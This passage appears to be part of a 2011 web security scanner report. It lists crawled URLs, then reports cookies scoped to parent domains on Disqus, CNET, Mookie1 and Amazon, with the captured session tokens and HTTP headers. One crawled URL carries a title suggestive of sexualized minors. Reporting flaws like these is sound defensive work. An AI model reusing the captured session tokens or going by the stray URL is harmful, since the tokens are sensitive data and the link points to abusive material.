http://scholar.google.com/schhp
http://scholar.google.com/scholar
http://segment-pixel.invitemedia.com/pixel
http://segment-pixel.invitemedia.com/unpixel
http://shopping.tweetmeme.com/
http://smallbusinessnews.tweetmeme.com/
http://smp.specificmedia.com/smp/v=5
http://su.addthis.com/red/usync
http://tacoda.at.atwola.com/rtx/r.js
http://tags.bluekai.com/site/10
http://tags.bluekai.com/site/2981
http://translate.google.com/
http://translate.google.com/translate_t
http://ugg.tweetmeme.com/
http://video.google.com/
http://video.google.com/videosearch
http://www.apture.com/js/apture.js
http://www.automotive.com/x22
http://www.autotrader.com/fyc/index.jsp/x22
http://www.autotrader.com/hornav/trader/index.jsp/x22
http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis
http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis
http://www.autotrader.com/research/certified-cars/index.jsp/x22
http://www.autotrader.com/research/index.jsp/x22
http://www.autotrader.com/research/new-cars/index.jsp/x22
http://www.autotrader.com/research/used-cars/index.jsp/x22
http://www.autotrader.com/x22/x3e/x3cli
http://www.autotraderclassics.com/find/index.xhtml/x22
http://www.autotraderclassics.com/x22
http://www.backtype.com/search
http://www.blip.tv/about/
http://www.blip.tv/blogs/
http://www.blip.tv/prefs/
http://www.care2.com/news/news_post.html
http://www.elmundo.es/
http://www.employmentguide.com/
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/7NEWS
http://www.facebook.com/LIMEprpromo
http://www.facebook.com/abid.bahloul
http://www.facebook.com/apps/application.php
http://www.facebook.com/beirutcityguide
http://www.facebook.com/campaign/impression.php
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/home.php
http://www.facebook.com/miofeghali
http://www.facebook.com/pages/Traverse-City-MI/CloudAccessnet/116931806748
http://www.facebook.com/paty.kfoury
http://www.facebook.com/profile.php
http://www.facebook.com/sharer.php
http://www.flickr.com/photos/aubalumni/4688630122/x22
http://www.flickr.com/photos/favoritltd/4795390303/
http://www.flickr.com/photos/favoritltd/4795390991/
http://www.flickr.com/photos/favoritltd/4795392149/
http://www.flickr.com/photos/favoritltd/4795392811/
http://www.flickr.com/photos/favoritltd/4796022554/
http://www.flickr.com/photos/favoritltd/4796024690/
http://www.forumas.lithuanianjoomla.com/download.php
http://www.google.com/finance
http://www.google.com/setprefs
http://www.google.com/url
http://www.groupon.com/washington-dc/subscribe
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp
http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26source/x3duniv/x26sa/x3dX/x26ei/x3dh5I9TauLMMK88gazprSzCg/x26sqi/x3d2/x26ved/x3d0CHcQtgowCg/x22/x3eShared
http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
http://www.homes.com/
http://www.jobalot.com/
http://www.linkedin.com/company/805465
http://www.livejournal.com/update.bml
http://www.newsvine.com/_wine/save
http://www.officedepot.com/promo.do
https://www.paypal.com/cgi-bin/webscr
http://www.tuenti.com/
https://www.tuenti.com/
http://www.veoh.com/videodetails2.swf
http://www.wireless.att.com/learn/articles-resources/community-support/recycling.jsp
http://www.youtube.com/
http://www.youtube.com/results
http://www.youtube.com/subscribe_widget
http://www.zazzle.com/netlingo
http://www1.whdh.com/
http://www3.whdh.com/mobile/phoneforecast/settings.php
http://xads.zedo.com/ads3/a
http://xfactor.tweetmeme.com/
http://yoga.tweetmeme.com/
http://youtube.tweetmeme.com/

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

13.1. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://7newsboston.disqus.com
Path:	/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/ HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 302 FOUND
Date: Mon, 24 Jan 2011 22:27:59 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: sessionid=fc05e21a91a616ef2d73501d05b7cdf8; Domain=.disqus.com; expires=Mon, 07-Feb-2011 22:27:59 GMT; Max-Age=1209600; Path=/
Location: http://7newsboston.disqus.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

13.2. http://news.cnet.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://news.cnet.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.3. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

session=1295919344|1295919344; path=/; domain=.mookie1.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t/v1/imp?%25&migAgencyId=111&migSource=adsrv2&migTrackDataExt=2356384;58746736;233909482;38657313&migRandom=2148129&migTrackFmtExt=client;io;ad;crtv HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: session=1295919344|1295919344; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

13.4. http://www.amazon.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0141411-2666057; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
skin=noskin; path=/; domain=.amazon.com; expires=Tue, 25-Jan-2011 14:04:22 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.5. http://www.amazon.com/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reader-Wifi-Graphite/dp/B002Y27P3M/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=191-9849773-1831958; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.6. http://www.amazon.com/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/Kindle-Wireless-Reading-Device-Display/dp/B0015T963C/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=187-6920967-0553225; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.7. http://www.amazon.com/b/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/b/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1Z8842RFJJQ53HA29PKK
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Thz+3TyDFYah1x3ei6oQr/mo+vx0XErnPjJ/ljJngQIg1o7JCKD0eSlBevy55XTo
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=184-9752175-3585404; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.8. http://www.amazon.com/books-used-books-textbooks/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/books-used-books-textbooks/b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /books-used-books-textbooks/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:25 GMT
Server: Server
x-amz-id-1: 0PN0C1SZEXY20ARQ0EZ7
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Crev47aQfB2uqb2X//rUO4Hxdev3PyQ/5jNKWV00peXpTx5B0oH6Vgmw1c8EiiK+
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=175-9805255-9723637; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.9. http://www.amazon.com/dp/0313363153 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0313363153

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.10. http://www.amazon.com/dp/0814410960 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/0814410960

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-7210136-6598218; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=y3NkdEGeLcNmXCUiBl72zia0IgOUlzJisM6ejtj6++wAzjFW+0MbDLrBrMTYId5ScAAIGSpPr8ov4wvfMrz16qkoExEE846LElBHdCDq1wJ5G3PyH/8+t8ULEiTMRJzZ+/UmohvS0s1wbtQLhB5tRJaj+v9Qvdikv5wA8Z+9BSaQuNwa25tYVL3brZaSaxoPnkAsz7sFby/Vm3IEdAyCOCgmDlA7LSKWp7BGexnTvAm3XJETeqxNVJ4XDLyzD9mn489zuGO7Hr1Q5jDtdTkD7MsDhmN6H6NA+BAMoVhXzdj8ywD6RaU+CKSyhgSibHDJfiAf99mXgDVIui4kc0MR8MKRTBSKmuzQBaMCl0Pf98laS7P8B1wibfy99GA8Gxn4ZYxd9IYn+0IOEpAUVtWvSy3VhH2tV4F6FYuFOflVaV1k+o8nZAdjmsVsH/6mMkOtJfcsZt8CR0o=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:31 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.11. http://www.amazon.com/dp/B000EFAO1G previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B000EFAO1G

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0598759-1123006; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=5+EPReZ8AKa7WMIFgy9cHbJVm/9tgaQgv25tnd2EAaj3A2TcoX3BYNQp+U2mBhaH6NNnCCgyjvtkzGGKQPpSQ8YmQMO5JCKLveLlxt9MugLIEpGsQ9/N5+Fno+1FBJOzE7k6DdNtiYO1TD+phGkOUWQ/bAQscWvK7bSH45/y7GXOXIwlbx9HtoYer2qT3bQI/XgRYyDrwUk/3MaxWfXupPISlccJHK+MMD1RlV2PpGnjij8hwxwPu8lFWY2ZyFBuWpfgJTPLmLB81bUuXAJVuEItWLbeo9hG152TFm3xHDssaIPB8rAFW82FLjl1caASZ+3mXZbbwjY5FdvZ3bSUoEYv4rJBnYTCCcuaPY0qDbp0lBhPOVi0eyvDVbNk4+/Hftrx7HmCu7QjCyC5NYd3aS1DdMQsjfynRE0x7QVCx6RwexxPari5JWk0LW4Q/jcI4R+KwxWl55I=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:26 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B000EFAO1G?tag=parenthoodcom-20&camp=211493&creative=379969&linkCode=op1&creativeASIN=B000EFAO1G&adid=0GZGV3PX406SYA9DGF7Q& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.12. http://www.amazon.com/dp/B001AIM6V2 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B001AIM6V2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-9936733-9404845; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=gpJo3CBiqTqDVIjaNvl4zvNYaep1x/cFw36XGdvu+t3AZoNYj5i0ue/20d7C2ZC+I33rSpZQv0bL0wk1Ew8YoO+rtNcIBPKLYOhOlxvFtzRIdn3kvGu6M4tMOkmBEeryBbTVlsJzSNcfMpAFM/xng7ZCP9yYT0m2OdKey3rxmCeD+Fl0AmJvQvFSHWkk425/o8Da9DpaI74WLGaJ7uNOvo6JLwZb5sYP9TvVnm5hmJQsWKXZoF2OyiWVivGgzTAUd6pRUIbYAZkt1sGVL+jil+zZfxZVnjBewrBhOy9v7AhUD8T6SoAGbb4KE5ZJBYWH2OXsSjuLHVIc52YxHzs6raEMD1dV4RY1XTDpsD0MSkGHFH6QBIcq1zDxTwlTMAha08n0zKNwM+cU9SxT/rymeyJe0yjBe5km9qvYTfgoBDkuOc+G0APo8cpXuSfIyagOnBt68PFK8so=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:05:21 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B001AIM6V2?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B001AIM6V2&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.13. http://www.amazon.com/dp/B0037UT1LY previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dp/B0037UT1LY

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=188-3953038-0825847; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=bK6rGx+CGyD+cP8GmimTlX4yOKqJEvwu6UnJY2SjL1UcG5vQjcyPPRSMkmQN8sbphtWyqe3kQNCI8rylaXXfj7BtPqZ81YiplXuRUKMy3Z/2mvrL0RV2OkiG88oBA7HbQe9Kd7fvezmpNGVnUs/WKVjx/v0XDHsIO3F31lrklY6f9VkJODasmR+vrmz5jfMxq2bRIKLa3TnEq25JcifPmFz90PVXykz/U8VHJ0uNE7A+Lbt2L2Z/SjjIzqMfkvaEaJ5CGm8K5P8lXwVh0vUHjthXVRSI9Cep53mqSnG9l0pUNqqdm4ZhxMz2Fnam7evwK9iiJKrdcr/H6916sNYxoaW3SE1y+GzhrAbM2j5TccGcCjdm1TEIUPGgRv1ET/0d7xHLJPqSIn5j3GRpNMwhQIwtYGX6XK/au2mTa3txsuMyDFNmteb/ybxsSFJKnNmQPriNDYGWivE=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:34 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dp/B0037UT1LY?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=B0037UT1LY&adid=1E43GGA9XAJKCAEXAPNZ& HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.14. http://www.amazon.com/dvds-used-hd-action-comedy-oscar/b previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/dvds-used-hd-action-comedy-oscar/b

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dvds-used-hd-action-comedy-oscar/b HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:30 GMT
Server: Server
x-amz-id-1: 0HWNJZZ0K25G6APS0SCV
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: PlF2/QEU0gca0keikYl5AAloXjb8+bYTwS4SenUAsR2Hj9g7OaMuaVTR9h/a5nWz
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7992041-7051429; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16144

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...

13.15. http://www.amazon.com/gp/css/homepage.html/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/css/homepage.html/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/css/homepage.html/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:28 GMT
Server: Server
x-amz-id-1: 1JYB2VNQP8C55BB9NAK4
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 3icGnhgAgfZUWLOZdmzfhDcF9EfU4+FBrZdxGpszK5HnHwSQN6UjuQ==
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=180-2179319-0570468; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16226

<html>
<head>

<style type="text/css"><!--

.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.16. http://www.amazon.com/gp/gc/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/gc/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gp/gc/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:29 GMT
Server: Server
x-amz-id-1: 1ARA2838P595NDE5BZ28
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: NeLbCQZvKIRHPa3udnf+jNalHfYaZDtVVTT+qpr1m3zHmdMhK0a3n/4PuJMtXurr
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=182-2480063-1810947; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 16234

<html>
<head>

<style type="text/css"><!--

.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-s
...[SNIP]...

13.17. http://www.amazon.com/gp/product/0596804946 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0596804946

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=177-3345764-3077262; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
UserPref=1eR/Gb/7VAeIWvMabpkc9WVd0hSTZUbBg6Yo0T7TCpNQeuSuXtGxH2kY6bTAbin+sFXFOKV5+ocOk7K3+MvDkq0/b9bHz0ODJNpZCfzlXrKaMkf2mByUw4O7H6y0HxLzB0zDpXYjvDZIG9tAgupLtlSzvaVuVoeT9Dw57HxRkT1qFd69t1G9yhJCF1dMGn6BtkhaXaKQIwqLrzarx2jcK/uWu/DYGLfPjmFfwQeqDQqf1Pu2Z67u5nMckQSNU+AXG+4uuNDdjSW4U7/7jDdJMbrRu9ZM6nSR6im5LlC77EvTc5TQz8tq18VhoFQQ90njlOAwxtXq+PDB/vmIDD+i66lzV9/NoXGIbcoNaqBVAhvyZOIdxNL/NLFlkx8w8BdoJeoQup2Vg9OErw1DYhMF9610T7Jg13XTgsW4sfARA2h+TBwY5xsP9yVw1aDK1Hh6; path=/; domain=.amazon.com; expires=Tue Feb 01 14:04:19 2011 GMT

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

